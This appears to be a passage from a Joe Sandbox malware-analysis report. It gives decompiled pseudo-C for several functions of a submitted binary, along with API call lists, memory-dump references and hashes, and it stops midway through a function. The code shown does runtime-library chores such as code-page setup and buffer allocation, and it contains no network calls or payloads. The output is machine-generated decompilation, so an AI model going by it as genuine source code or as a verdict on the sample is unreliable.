                                                        • API String ID: 2742660187-671089009
                                                        • Opcode ID: 43324065e282cae6ce8f47f6624fe3617891cc9f0de593198f1e8a4e648e4ad3
                                                        • Instruction ID: 7635bbb38a0884c0a873c026863e2f133470395038bcceb33c33e40174933e48
                                                        • Opcode Fuzzy Hash: 43324065e282cae6ce8f47f6624fe3617891cc9f0de593198f1e8a4e648e4ad3
                                                        • Instruction Fuzzy Hash: 20D02B23B807343BC90432EC3D039AD7A449702FB2F490571FF0C1E1419755461001C5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A2B660 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 92%
                                                        			E00A2B660(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				signed int _v32;
				signed int _v36;
				signed int _t48;
				int _t51;
				signed int _t54;
				signed int _t55;
				short _t58;
				signed char _t62;
				signed int _t63;
				signed char* _t72;
				signed char* _t73;
				int _t78;
				signed int _t81;
				signed char* _t82;
				short* _t83;
				int _t87;
				signed char _t88;
				signed int _t89;
				signed int _t91;
				signed int _t92;
				int _t94;
				int _t95;
				intOrPtr _t98;
				signed int _t99;

				_t48 =  *0xa3e668; // 0xcba178b4
				_v8 = _t48 ^ _t99;
				_t98 = _a8;
				_t78 = E00A2B22B(__eflags, _a4);
				if(_t78 != 0) {
					_t94 = 0;
					__eflags = 0;
					_t81 = 0;
					_t51 = 0;
					_v32 = 0;
					while(1) {
						__eflags =  *((intOrPtr*)(_t51 + 0xa3e828)) - _t78;
						if( *((intOrPtr*)(_t51 + 0xa3e828)) == _t78) {
							break;
						}
						_t81 = _t81 + 1;
						_t51 = _t51 + 0x30;
						_v32 = _t81;
						__eflags = _t51 - 0xf0;
						if(_t51 < 0xf0) {
							continue;
						} else {
							__eflags = _t78 - 0xfde8;
							if(_t78 == 0xfde8) {
								L23:
							} else {
								__eflags = _t78 - 0xfde9;
								if(_t78 == 0xfde9) {
									goto L23;
								} else {
									_t51 = IsValidCodePage(_t78 & 0x0000ffff);
									__eflags = _t51;
									if(_t51 == 0) {
										goto L23;
									} else {
										_t51 = GetCPInfo(_t78,  &_v28);
										__eflags = _t51;
										if(_t51 == 0) {
											__eflags =  *0xa616cc - _t94; // 0x0
											if(__eflags == 0) {
												goto L23;
											} else {
												E00A2B29E(_t98);
												goto L37;
											}
										} else {
											E00A1F5F0(_t94, _t98 + 0x18, _t94, 0x101);
											 *(_t98 + 4) = _t78;
											 *(_t98 + 0x21c) = _t94;
											_t78 = 1;
											__eflags = _v28 - 1;
											if(_v28 <= 1) {
												 *(_t98 + 8) = _t94;
											} else {
												__eflags = _v22;
												_t72 =  &_v22;
												if(_v22 != 0) {
													while(1) {
														_t88 = _t72[1];
														__eflags = _t88;
														if(_t88 == 0) {
															goto L16;
														}
														_t91 = _t88 & 0x000000ff;
														_t89 =  *_t72 & 0x000000ff;
														while(1) {
															__eflags = _t89 - _t91;
															if(_t89 > _t91) {
																break;
															}
															 *(_t98 + _t89 + 0x19) =  *(_t98 + _t89 + 0x19) | 0x00000004;
															_t89 = _t89 + 1;
															__eflags = _t89;
														}
														_t72 =  &(_t72[2]);
														__eflags =  *_t72;
														if( *_t72 != 0) {
															continue;
														}
														goto L16;
													}
												}
												L16:
												_t73 = _t98 + 0x1a;
												_t87 = 0xfe;
												do {
													 *_t73 =  *_t73 | 0x00000008;
													_t73 =  &(_t73[1]);
													_t87 = _t87 - 1;
													__eflags = _t87;
												} while (_t87 != 0);
												 *(_t98 + 0x21c) = E00A2B1ED( *(_t98 + 4));
												 *(_t98 + 8) = _t78;
											}
											_t95 = _t98 + 0xc;
											asm("stosd");
											asm("stosd");
											asm("stosd");
											L36:
											E00A2B303(_t78, _t91, _t95, _t98, _t98); // executed
											L37:
											__eflags = 0;
										}
									}
								}
							}
						}
						goto L39;
					}
					E00A1F5F0(_t94, _t98 + 0x18, _t94, 0x101);
					_t54 = _v32 * 0x30;
					__eflags = _t54;
					_v36 = _t54;
					_t55 = _t54 + 0xa3e838;
					_v32 = _t55;
					do {
						__eflags =  *_t55;
						_t82 = _t55;
						if( *_t55 != 0) {
							while(1) {
								_t62 = _t82[1];
								__eflags = _t62;
								if(_t62 == 0) {
									break;
								}
								_t92 =  *_t82 & 0x000000ff;
								_t63 = _t62 & 0x000000ff;
								while(1) {
									__eflags = _t92 - _t63;
									if(_t92 > _t63) {
										break;
									}
									__eflags = _t92 - 0x100;
									if(_t92 < 0x100) {
										_t31 = _t94 + 0xa3e820; // 0x8040201
										 *(_t98 + _t92 + 0x19) =  *(_t98 + _t92 + 0x19) |  *_t31;
										_t92 = _t92 + 1;
										__eflags = _t92;
										_t63 = _t82[1] & 0x000000ff;
										continue;
									}
									break;
								}
								_t82 =  &(_t82[2]);
								__eflags =  *_t82;
								if( *_t82 != 0) {
									continue;
								}
								break;
							}
							_t55 = _v32;
						}
						_t94 = _t94 + 1;
						_t55 = _t55 + 8;
						_v32 = _t55;
						__eflags = _t94 - 4;
					} while (_t94 < 4);
					 *(_t98 + 4) = _t78;
					 *(_t98 + 8) = 1;
					 *(_t98 + 0x21c) = E00A2B1ED(_t78);
					_t83 = _t98 + 0xc;
					_t91 = _v36 + 0xa3e82c;
					_t95 = 6;
					do {
						_t58 =  *_t91;
						_t91 = _t91 + 2;
						 *_t83 = _t58;
						_t83 = _t83 + 2;
						_t95 = _t95 - 1;
						__eflags = _t95;
					} while (_t95 != 0);
					goto L36;
				} else {
					E00A2B29E(_t98);
				}
				L39:
				return E00A1EEFA(_v8 ^ _t99);
			}






























                                                        0x00a2b668
                                                        0x00a2b66f
                                                        0x00a2b677
                                                        0x00a2b67f
                                                        0x00a2b684
                                                        0x00a2b695
                                                        0x00a2b695
                                                        0x00a2b697
                                                        0x00a2b699
                                                        0x00a2b69b
                                                        0x00a2b69e
                                                        0x00a2b69e
                                                        0x00a2b6a4
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2b6aa
                                                        0x00a2b6ab
                                                        0x00a2b6ae
                                                        0x00a2b6b1
                                                        0x00a2b6b6
                                                        0x00000000
                                                        0x00a2b6b8
                                                        0x00a2b6b8
                                                        0x00a2b6be
                                                        0x00a2b78c
                                                        0x00a2b6c4
                                                        0x00a2b6c4
                                                        0x00a2b6ca
                                                        0x00000000
                                                        0x00a2b6d0
                                                        0x00a2b6d4
                                                        0x00a2b6da
                                                        0x00a2b6dc
                                                        0x00000000
                                                        0x00a2b6e2
                                                        0x00a2b6e7
                                                        0x00a2b6ed
                                                        0x00a2b6ef
                                                        0x00a2b779
                                                        0x00a2b77f
                                                        0x00000000
                                                        0x00a2b781
                                                        0x00a2b782
                                                        0x00000000
                                                        0x00a2b782
                                                        0x00a2b6f5
                                                        0x00a2b6ff
                                                        0x00a2b704
                                                        0x00a2b70c
                                                        0x00a2b712
                                                        0x00a2b713
                                                        0x00a2b716
                                                        0x00a2b769
                                                        0x00a2b718
                                                        0x00a2b718
                                                        0x00a2b71c
                                                        0x00a2b71f
                                                        0x00a2b721
                                                        0x00a2b721
                                                        0x00a2b724
                                                        0x00a2b726
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2b728
                                                        0x00a2b72b
                                                        0x00a2b736
                                                        0x00a2b736
                                                        0x00a2b738
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2b730
                                                        0x00a2b735
                                                        0x00a2b735
                                                        0x00a2b735
                                                        0x00a2b73a
                                                        0x00a2b73d
                                                        0x00a2b740
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2b740
                                                        0x00a2b721
                                                        0x00a2b742
                                                        0x00a2b742
                                                        0x00a2b745
                                                        0x00a2b74a
                                                        0x00a2b74a
                                                        0x00a2b74d
                                                        0x00a2b74e
                                                        0x00a2b74e
                                                        0x00a2b74e
                                                        0x00a2b75e
                                                        0x00a2b764
                                                        0x00a2b764
                                                        0x00a2b76e
                                                        0x00a2b771
                                                        0x00a2b772
                                                        0x00a2b773
                                                        0x00a2b837
                                                        0x00a2b838
                                                        0x00a2b83d
                                                        0x00a2b83e
                                                        0x00a2b83e
                                                        0x00a2b6ef
                                                        0x00a2b6dc
                                                        0x00a2b6ca
                                                        0x00a2b6be
                                                        0x00000000
                                                        0x00a2b840
                                                        0x00a2b79e
                                                        0x00a2b7a6
                                                        0x00a2b7a6
                                                        0x00a2b7aa
                                                        0x00a2b7ad
                                                        0x00a2b7b3
                                                        0x00a2b7b6
                                                        0x00a2b7b6
                                                        0x00a2b7b9
                                                        0x00a2b7bb
                                                        0x00a2b7bd
                                                        0x00a2b7bd
                                                        0x00a2b7c0
                                                        0x00a2b7c2
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2b7c4
                                                        0x00a2b7c7
                                                        0x00a2b7e3
                                                        0x00a2b7e3
                                                        0x00a2b7e5
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2b7cc
                                                        0x00a2b7d2
                                                        0x00a2b7d4
                                                        0x00a2b7da
                                                        0x00a2b7de
                                                        0x00a2b7de
                                                        0x00a2b7df
                                                        0x00000000
                                                        0x00a2b7df
                                                        0x00000000
                                                        0x00a2b7d2
                                                        0x00a2b7e7
                                                        0x00a2b7ea
                                                        0x00a2b7ed
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2b7ed
                                                        0x00a2b7ef
                                                        0x00a2b7ef
                                                        0x00a2b7f2
                                                        0x00a2b7f3
                                                        0x00a2b7f6
                                                        0x00a2b7f9
                                                        0x00a2b7f9
                                                        0x00a2b7ff
                                                        0x00a2b802
                                                        0x00a2b811
                                                        0x00a2b81a
                                                        0x00a2b81f
                                                        0x00a2b825
                                                        0x00a2b826
                                                        0x00a2b826
                                                        0x00a2b829
                                                        0x00a2b82c
                                                        0x00a2b82f
                                                        0x00a2b832
                                                        0x00a2b832
                                                        0x00a2b832
                                                        0x00000000
                                                        0x00a2b686
                                                        0x00a2b687
                                                        0x00a2b68d
                                                        0x00a2b841
                                                        0x00a2b850

                                                        APIs
                                                          • Part of subcall function 00A2B22B: GetOEMCP.KERNEL32(00000000,?,?,00A2B4B4,?), ref: 00A2B256
                                                        • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00A2B4F9,?,00000000), ref: 00A2B6D4
                                                        • GetCPInfo.KERNEL32(00000000,00A2B4F9,?,?,?,00A2B4F9,?,00000000), ref: 00A2B6E7
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: CodeInfoPageValid
                                                        • String ID:
                                                        • API String ID: 546120528-0
                                                        • Opcode ID: 204fefdaa89f4e0544841e8d7b7005309f9eaa1e139a5706e1ed7404254eead0
                                                        • Instruction ID: 109943014c0005aa29c8067d83fe91622655a235d7b73ec5cd86e66d6b6e27b0
                                                        • Opcode Fuzzy Hash: 204fefdaa89f4e0544841e8d7b7005309f9eaa1e139a5706e1ed7404254eead0
                                                        • Instruction Fuzzy Hash: 60514274D212259FDB20CF79E8816BABBF5EF91300F14407EE4868B292D7359942CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A12E9E Relevance: 3.1, APIs: 2, Instructions: 112COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 86%
                                                        			E00A12E9E(void* __ebx, void* __ecx, void* __ebp, intOrPtr _a4, char _a8) {
				char _v12;
				signed int _v16;
				char _v17;
				signed int _v28;
				void* __edi;
				intOrPtr _t48;
				signed int _t49;
				signed int _t59;
				intOrPtr _t68;
				void* _t71;
				signed int _t75;
				signed int* _t77;
				void* _t89;
				void* _t91;
				signed int _t95;
				signed int* _t97;
				void* _t99;
				signed int _t100;
				void* _t102;
				void* _t103;

				_t99 = __ebp;
				_t72 = __ecx;
				_t103 = _t102 - 0x14;
				_t68 = _a4;
				_t89 = __ecx;
				if(_t68 == 0) {
					_t72 = 0xa40f50;
					E00A06EDC(0xa40f50);
				}
				_t48 = 0x40000;
				if(_t68 < 0x40000) {
					_t68 = 0x40000;
					_a4 = 0x40000;
				}
				if(_t68 <=  *((intOrPtr*)(_t89 + 0xe6d8))) {
					L29:
					return _t48;
				} else {
					if(_a8 == 0 ||  *(_t89 + 0x4b40) == 0 &&  *((char*)(_t89 + 0x4c44)) == 0) {
						_v17 = 0;
						goto L11;
					} else {
						_v17 = 1;
						if( *((char*)(_t89 + 0x4c44)) == 0) {
							L11:
							_push(_t99);
							if( *((char*)(_t89 + 0x4c44)) == 0) {
								_push(_t68); // executed
								_t49 = E00A238A3(_t72); // executed
								_t100 = _t49;
								if(_t100 != 0) {
									goto L19;
								} else {
									goto L14;
								}
							} else {
								_t100 = 0;
								L14:
								if(_v17 != 0 || _t68 < 0x1000000) {
									goto L31;
								} else {
									_t60 =  *(_t89 + 0x4b40);
									if( *(_t89 + 0x4b40) != 0) {
										L00A2389E(_t60);
										 *(_t89 + 0x4b40) =  *(_t89 + 0x4b40) & 0x00000000;
									}
									E00A12DD7(_t68, _t89 + 0x4b44, _t100, _t68);
									 *((char*)(_t89 + 0x4c44)) = 1;
									L19:
									if( *((char*)(_t89 + 0x4c44)) == 0) {
										E00A1F5F0(_t89, _t100, 0, _t68);
										_t103 = _t103 + 0xc;
										if(_v17 != 0 &&  *((intOrPtr*)(_t89 + 0xe6d8)) >= 1) {
											_t75 = _t68 - 1;
											_v16 = _t75;
											_t71 = 1;
											do {
												_t95 =  *((intOrPtr*)(_t89 + 0x7c)) - _t71;
												_t71 = _t71 + 1;
												 *((char*)((_t75 & _t95) + _t100)) =  *((intOrPtr*)(( *((intOrPtr*)(_t89 + 0xe6d8)) - 0x00000001 & _t95) +  *(_t89 + 0x4b40)));
												_t75 = _v16;
											} while (_t71 <=  *((intOrPtr*)(_t89 + 0xe6d8)));
											_t68 = _a4;
										}
										_t51 =  *(_t89 + 0x4b40);
										if( *(_t89 + 0x4b40) != 0) {
											L00A2389E(_t51);
										}
										 *(_t89 + 0x4b40) = _t100;
									}
									_t48 = _t68 - 1;
									 *((intOrPtr*)(_t89 + 0xe6d8)) = _t68;
									 *((intOrPtr*)(_t89 + 0xe6dc)) = _t48;
									goto L29;
								}
							}
						} else {
							E00A11D08( &_v12);
							E00A218C8( &_v12, 0xa3b704);
							L31:
							_t77 =  &_v12;
							E00A11D08(_t77);
							E00A218C8( &_v12, 0xa3b704);
							asm("int3");
							_push(_t93);
							_t97 = _t77;
							_push(_t89);
							_t91 = 4;
							_t97[1] = _t97[1] & 0x00000000;
							 *_t97 =  *_t97 & 0x00000000;
							_t97[2] = _t97[2] | 0xffffffff;
							_t97[6] = _v28;
							do {
								_t59 = E00A12C3D(_t97[6]);
								_t97[1] = _t97[1] << 0x00000008 | _t59;
								_t91 = _t91 - 1;
							} while (_t91 != 0);
							return _t59;
						}
					}
				}
			}























                                                        0x00a12e9e
                                                        0x00a12e9e
                                                        0x00a12e9e
                                                        0x00a12ea2
                                                        0x00a12ea7
                                                        0x00a12eab
                                                        0x00a12ead
                                                        0x00a12eb2
                                                        0x00a12eb2
                                                        0x00a12eb7
                                                        0x00a12ebe
                                                        0x00a12ec0
                                                        0x00a12ec2
                                                        0x00a12ec2
                                                        0x00a12ecc
                                                        0x00a12fe5
                                                        0x00a12fea
                                                        0x00a12ed2
                                                        0x00a12ed7
                                                        0x00a12efe
                                                        0x00000000
                                                        0x00a12eeb
                                                        0x00a12ef2
                                                        0x00a12ef7
                                                        0x00a12f03
                                                        0x00a12f0a
                                                        0x00a12f0b
                                                        0x00a12f11
                                                        0x00a12f12
                                                        0x00a12f17
                                                        0x00a12f1c
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a12f0d
                                                        0x00a12f0d
                                                        0x00a12f1e
                                                        0x00a12f23
                                                        0x00000000
                                                        0x00a12f35
                                                        0x00a12f35
                                                        0x00a12f3d
                                                        0x00a12f40
                                                        0x00a12f45
                                                        0x00a12f4c
                                                        0x00a12f54
                                                        0x00a12f59
                                                        0x00a12f60
                                                        0x00a12f67
                                                        0x00a12f6d
                                                        0x00a12f72
                                                        0x00a12f7a
                                                        0x00a12f85
                                                        0x00a12f8a
                                                        0x00a12f8e
                                                        0x00a12f90
                                                        0x00a12f99
                                                        0x00a12fa6
                                                        0x00a12faa
                                                        0x00a12fad
                                                        0x00a12fb1
                                                        0x00a12fb9
                                                        0x00a12fbd
                                                        0x00a12fbe
                                                        0x00a12fc6
                                                        0x00a12fc9
                                                        0x00a12fce
                                                        0x00a12fcf
                                                        0x00a12fcf
                                                        0x00a12fd5
                                                        0x00a12fd8
                                                        0x00a12fde
                                                        0x00000000
                                                        0x00a12fe4
                                                        0x00a12f23
                                                        0x00a12ef9
                                                        0x00a12ff1
                                                        0x00a13000
                                                        0x00a13005
                                                        0x00a13005
                                                        0x00a13009
                                                        0x00a13018
                                                        0x00a1301d
                                                        0x00a13022
                                                        0x00a13023
                                                        0x00a13025
                                                        0x00a13028
                                                        0x00a13029
                                                        0x00a1302d
                                                        0x00a13030
                                                        0x00a13034
                                                        0x00a13037
                                                        0x00a1303a
                                                        0x00a13047
                                                        0x00a1304a
                                                        0x00a1304a
                                                        0x00a13051
                                                        0x00a13051
                                                        0x00a12ef7
                                                        0x00a12ed7

                                                        APIs
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00A13000
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00A13018
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: Exception@8Throw
                                                        • String ID:
                                                        • API String ID: 2005118841-0
                                                        • Opcode ID: 35b3a01db91a1d08087b34b713377e351edb51b8fff2a57970918918dfe180e3
                                                        • Instruction ID: 31acb4dd2dbc72efc4e7f90bf64a952aeafa0200e4b0d472a8930989c20ad610
                                                        • Opcode Fuzzy Hash: 35b3a01db91a1d08087b34b713377e351edb51b8fff2a57970918918dfe180e3
                                                        • Instruction Fuzzy Hash: EE4104B5A08381AFE72CEB34E584BD6FBA4BB94304F04052EE25953182D774E8F8C795
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A013A7 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 96%
                                                        			E00A013A7(intOrPtr* __ecx, void* __edx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t56;
				signed int _t62;
				signed int _t63;
				char _t64;
				intOrPtr _t74;
				intOrPtr* _t78;
				void* _t86;
				void* _t87;
				intOrPtr* _t89;
				void* _t91;
				void* _t96;

				_t96 = __eflags;
				_t87 = __edi;
				_t86 = __edx;
				_t78 = __ecx;
				E00A1E554(_t56, _t91);
				_push(_t78);
				_push(_t78);
				_t89 = _t78;
				 *((intOrPtr*)(_t91 - 0x10)) = _t89;
				E00A097B6(_t78);
				 *_t89 = 0xa335b8;
				 *((intOrPtr*)(_t91 - 4)) = 0;
				E00A05FD7(_t89 + 0x1028, _t86, _t96);
				 *((char*)(_t91 - 4)) = 1;
				E00A0CA2B(_t89 + 0x20e8, _t86, _t96);
				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
				E00A01541();
				_t62 = E00A01541();
				 *((char*)(_t91 - 4)) = 4;
				_t63 = _t62 & 0xffffff00 |  *((intOrPtr*)(_t91 + 8)) == 0x00000000;
				 *((intOrPtr*)(_t89 + 0x21bc)) = 0;
				 *(_t89 + 0x21b8) = _t63;
				_t98 = _t63;
				if(_t63 == 0) {
					_t64 =  *((intOrPtr*)(_t91 + 8));
				} else {
					_t74 = E00A1E512(_t86, _t89, _t98, 0x82f0);
					 *((intOrPtr*)(_t91 - 0x14)) = _t74;
					 *((char*)(_t91 - 4)) = 5;
					if(_t74 == 0) {
						_t64 = 0;
					} else {
						_t64 = E00A0B26D(_t74); // executed
					}
				}
				 *((intOrPtr*)(_t89 + 0x21bc)) = _t64;
				 *(_t89 + 0x21c0) =  *(_t89 + 0x21c0) | 0xffffffff;
				 *(_t89 + 0x21c4) =  *(_t89 + 0x21c4) | 0xffffffff;
				 *(_t89 + 0x21c8) =  *(_t89 + 0x21c8) | 0xffffffff;
				 *((char*)(_t89 + 0x22)) =  *((intOrPtr*)(_t64 + 0x61a1));
				 *((intOrPtr*)(_t89 + 0x6cb0)) = 2;
				 *((intOrPtr*)(_t89 + 0x6cb4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cb8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cc0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
				 *((char*)(_t89 + 0x6cbc)) = 0;
				 *((short*)(_t89 + 0x6cc4)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cac)) = 0;
				E00A1F5F0(_t87, _t89 + 0x2208, 0, 0x40);
				E00A1F5F0(_t87, _t89 + 0x2248, 0, 0x34);
				E00A1F5F0(_t87, _t89 + 0x4590, 0, 0x20);
				 *((intOrPtr*)(_t89 + 0x6cd8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cec)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf4)) = 0;
				 *((short*)(_t89 + 0x6cfa)) = 0;
				 *((char*)(_t89 + 0x6cd6)) = 0;
				 *((char*)(_t89 + 0x6cf8)) = 0;
				 *((char*)(_t89 + 0x21e0)) = 0;
				 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
				return _t89;
			}















                                                        0x00a013a7
                                                        0x00a013a7
                                                        0x00a013a7
                                                        0x00a013a7
                                                        0x00a013a7
                                                        0x00a013ac
                                                        0x00a013ad
                                                        0x00a013b0
                                                        0x00a013b2
                                                        0x00a013b5
                                                        0x00a013bc
                                                        0x00a013c8
                                                        0x00a013cb
                                                        0x00a013d6
                                                        0x00a013da
                                                        0x00a013e5
                                                        0x00a013eb
                                                        0x00a013f1
                                                        0x00a013fc
                                                        0x00a01404
                                                        0x00a01408
                                                        0x00a0140b
                                                        0x00a01411
                                                        0x00a01417
                                                        0x00a01419
                                                        0x00a0143e
                                                        0x00a0141b
                                                        0x00a01420
                                                        0x00a01426
                                                        0x00a01429
                                                        0x00a0142f
                                                        0x00a0143a
                                                        0x00a01431
                                                        0x00a01433
                                                        0x00a01433
                                                        0x00a0142f
                                                        0x00a01441
                                                        0x00a0144d
                                                        0x00a01454
                                                        0x00a0145b
                                                        0x00a01464
                                                        0x00a0146f
                                                        0x00a01479
                                                        0x00a0147f
                                                        0x00a01485
                                                        0x00a0148b
                                                        0x00a01491
                                                        0x00a01497
                                                        0x00a0149d
                                                        0x00a014a4
                                                        0x00a014aa
                                                        0x00a014b0
                                                        0x00a014b6
                                                        0x00a014bc
                                                        0x00a014c2
                                                        0x00a014d1
                                                        0x00a014e0
                                                        0x00a014eb
                                                        0x00a014f3
                                                        0x00a014f9
                                                        0x00a014ff
                                                        0x00a01505
                                                        0x00a0150b
                                                        0x00a01511
                                                        0x00a01517
                                                        0x00a01520
                                                        0x00a01526
                                                        0x00a0152c
                                                        0x00a01534
                                                        0x00a0153e

                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 00A013A7
                                                          • Part of subcall function 00A05FD7: __EH_prolog.LIBCMT ref: 00A05FDC
                                                          • Part of subcall function 00A0CA2B: __EH_prolog.LIBCMT ref: 00A0CA30
                                                          • Part of subcall function 00A0CA2B: new.LIBCMT ref: 00A0CA73
                                                          • Part of subcall function 00A0CA2B: new.LIBCMT ref: 00A0CA97
                                                        • new.LIBCMT ref: 00A01420
                                                          • Part of subcall function 00A0B26D: __EH_prolog.LIBCMT ref: 00A0B272
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: H_prolog
                                                        • String ID:
                                                        • API String ID: 3519838083-0
                                                        • Opcode ID: 27de4d10b67d2385404d896657ec34cb2cb978df6d621ab8350413a35ca3a435
                                                        • Instruction ID: 5a97b4a564e02be3844aad81cb4572101bc8204426ef9ada4d1c0abb68d9c0bb
                                                        • Opcode Fuzzy Hash: 27de4d10b67d2385404d896657ec34cb2cb978df6d621ab8350413a35ca3a435
                                                        • Instruction Fuzzy Hash: 274177B0905B449EE720CF798585AE7FBE6FF18310F50492ED5EE87282DB326594CB11
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A013A2 Relevance: 3.1, APIs: 2, Instructions: 95COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00A013A2(intOrPtr* __ecx, void* __edx, void* __edi, void* __eflags) {
				void* __esi;
				signed int _t62;
				signed int _t63;
				char _t64;
				intOrPtr _t74;
				intOrPtr* _t78;
				void* _t86;
				void* _t87;
				intOrPtr* _t89;
				void* _t91;
				void* _t96;

				_t96 = __eflags;
				_t87 = __edi;
				_t86 = __edx;
				_t78 = __ecx;
				E00A1E554(E00A31F77, _t91);
				_t89 = _t78;
				 *((intOrPtr*)(_t91 - 0x10)) = _t89;
				E00A097B6(_t78);
				 *_t89 = 0xa335b8;
				 *((intOrPtr*)(_t91 - 4)) = 0;
				E00A05FD7(_t89 + 0x1028, _t86, _t96);
				 *((char*)(_t91 - 4)) = 1;
				E00A0CA2B(_t89 + 0x20e8, _t86, _t96);
				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
				E00A01541();
				_t62 = E00A01541();
				 *((char*)(_t91 - 4)) = 4;
				_t63 = _t62 & 0xffffff00 |  *((intOrPtr*)(_t91 + 8)) == 0x00000000;
				 *((intOrPtr*)(_t89 + 0x21bc)) = 0;
				 *(_t89 + 0x21b8) = _t63;
				_t98 = _t63;
				if(_t63 == 0) {
					_t64 =  *((intOrPtr*)(_t91 + 8));
				} else {
					_t74 = E00A1E512(_t86, _t89, _t98, 0x82f0);
					 *((intOrPtr*)(_t91 - 0x14)) = _t74;
					 *((char*)(_t91 - 4)) = 5;
					if(_t74 == 0) {
						_t64 = 0;
					} else {
						_t64 = E00A0B26D(_t74); // executed
					}
				}
				 *((intOrPtr*)(_t89 + 0x21bc)) = _t64;
				 *(_t89 + 0x21c0) =  *(_t89 + 0x21c0) | 0xffffffff;
				 *(_t89 + 0x21c4) =  *(_t89 + 0x21c4) | 0xffffffff;
				 *(_t89 + 0x21c8) =  *(_t89 + 0x21c8) | 0xffffffff;
				 *((char*)(_t89 + 0x22)) =  *((intOrPtr*)(_t64 + 0x61a1));
